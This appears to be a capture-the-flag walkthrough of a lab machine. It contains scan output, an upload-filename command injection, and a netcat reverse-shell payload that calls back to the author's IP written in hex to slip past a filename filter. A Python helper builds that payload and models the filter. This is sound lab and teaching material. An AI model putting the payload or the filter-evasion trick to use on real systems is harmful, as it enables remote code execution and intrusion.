PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
| 2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
| 256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
|_ 256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Tempus Fugit Durius
|_http-trane-info: Problem with XML parsing of /evox/about
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36350/udp6 status
| 100024 1 40573/tcp status
| 100024 1 50794/udp status
|_ 100024 1 54565/tcp6 status
40573/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
HTTP
Checking port 80 shows the following page:
Gobuster
I tried to run gobuster, but the server answers 200 OK for paths that do not exist, so gobuster stops at its wildcard check (output below). Forcing it through with --wildcard would just turn every word in the list into a false positive, so it is time for some manual enumeration.
gobuster dir -u http://10.10.174.220 -w /usr/share/wordlists/dirb/common.txt -e .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.174.220
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/05/18 17:56:13 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.174.220/085aca89-6cca-43b0-9d55-dd3fab285f8d => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
Checking the Upload Page
I tried uploading a PHP web shell, but it failed.
The application states that it only accepts txt and rtf files.
Uploading a TXT file
# I create a TXT file
echo "This is a test from squid22" > squid22.txt
Based on the upload message, I can see that the application reads the content of my TXT file.
Checking Possible RCE
This time I upload the same TXT file, but with the command id added to the filename, to see whether the name ends up in a shell command.
It did: the command was executed.
Exploit
Getting a shell with netcat was hit and miss. Every time I tried a different variation, I got a message saying the file name was too long.
After some research and a lot of failed attempts, I got a shell by writing my IP address in hex instead of dotted-quad form.
My filename payload to get a shell (nc's -e flag hands the connection to sh):
"#;nc 0x0A0B07BC 53 -e sh;a.txt"
0x0A0B07BC is 10.11.7.188 written as a single 32-bit hex number. If you try that on your own Kali machine you can see that nc accepts it: the address is parsed by inet_aton(), which takes hex, octal and plain decimal forms as well as dotted quads, so no dots are needed. The a.txt at the end is there for the file filter, which only allows TXT and RTF.
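To make the two moving parts of that payload concrete, here is an added example (not code from the write-up or from the target application). It models the address forms that inet_aton() accepts, so that you can see 0x0A0B07BC and 10.11.7.188 are the same host, and it models the upload-filename checks the page reports running into. The extension rule is stated on the page; the 32-character limit and the "only one dot" rule are assumptions made here for illustration (the page only shows a "file name too long" error and the dotted address failing while the hex one passed).

```python
# Added example: model inet_aton()-style address parsing and the observed
# upload-filename constraints. Nothing here touches the network.
import re


def ipv4_forms(dotted: str) -> dict:
    """Alternative spellings of a dotted-quad IPv4 address that BSD/glibc
    inet_aton() (the parser behind nc, ping, curl, ...) accepts: the whole
    address as one 32-bit number in hex, decimal or octal."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError("not a dotted quad: %r" % dotted)
    n = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
    return {"dotted": dotted, "hex": "0x%08X" % n,
            "decimal": str(n), "octal": "0%o" % n}


def legacy_inet_aton(text: str):
    """Pure-Python model of inet_aton()'s rules: 1 to 4 dot-separated parts,
    each decimal, 0-prefixed octal or 0x-prefixed hex; the last part fills
    all remaining bytes. Returns the canonical dotted quad, or None when
    inet_aton() would reject the string."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
            values.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]*", part):
            values.append(int(part, 8))
        elif re.fullmatch(r"[1-9][0-9]*", part):
            values.append(int(part, 10))
        else:
            return None
    *head, last = values
    if any(v > 255 for v in head):
        return None
    tail_bytes = 4 - len(head)
    if last >= 1 << (8 * tail_bytes):
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | last
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def build_filename_payload(addr_form: str, port: int, ext: str = "txt") -> str:
    """Filename in the shape the write-up uses: '#' and ';' cut off whatever
    command text precedes the name, nc dials back and hands the socket to sh
    (-e is the exec flag of the nc builds that support it), and a dummy name
    with an accepted extension satisfies the upload filter."""
    return "#;nc %s %d -e sh;a.%s" % (addr_form, port, ext)


def check_upload_filter(name: str, max_len: int = 32,
                        allowed=("txt", "rtf")) -> list:
    """Model of the upload-side checks. The extension rule is from the page;
    max_len is an ASSUMED value (page only reports 'file name too long');
    the single-dot rule is an ASSUMPTION consistent with the dotted address
    failing while the dot-free hex form passed. Returns rejection reasons
    (an empty list means the name is accepted)."""
    reasons = []
    _, dot, ext = name.rpartition(".")
    if not dot or ext.lower() not in allowed:
        reasons.append("extension must be one of %s" % ", ".join(allowed))
    if name.count(".") > 1:
        reasons.append("extra '.' in name (assumed check)")
    if len(name) > max_len:
        reasons.append("longer than %d characters (assumed limit)" % max_len)
    return reasons


if __name__ == "__main__":
    forms = ipv4_forms("10.11.7.188")  # attacker address used in the write-up
    for label, text in forms.items():
        print("%-8s %-14s -> %s" % (label, text, legacy_inet_aton(text)))
    for text in (forms["dotted"], forms["hex"]):
        name = build_filename_payload(text, 53)
        verdict = check_upload_filter(name)
        print(repr(name), "accepted" if not verdict else "rejected: %s" % verdict)
```

On a Linux box the libc parser can be checked directly: socket.inet_aton("0x0A0B07BC") returns the same four bytes as socket.inet_aton("10.11.7.188"), because glibc's inet_aton() accepts the 0x notation. The hex string can also be produced in bash with printf '0x%02X%02X%02X%02X\n' 10 11 7 188.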
Code Research
Only allows TXT and RTF
And here is why the IP address was failing...
Privilege Escalation
We find credentials under the /app directory that let us log in as root.